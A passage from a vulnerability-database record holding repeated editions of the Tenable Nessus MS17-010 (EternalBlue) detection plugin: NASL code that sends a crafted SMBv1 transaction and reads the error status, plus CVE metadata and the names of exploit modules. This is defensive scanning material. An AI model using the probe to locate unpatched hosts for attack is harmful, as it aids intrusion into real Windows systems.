script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-12T12:17:27", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 8}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:40", "history": [], "viewCount": 7174, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-08-19T12:37:40", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-08-19T12:37:40", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-08-19T12:37:40", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", 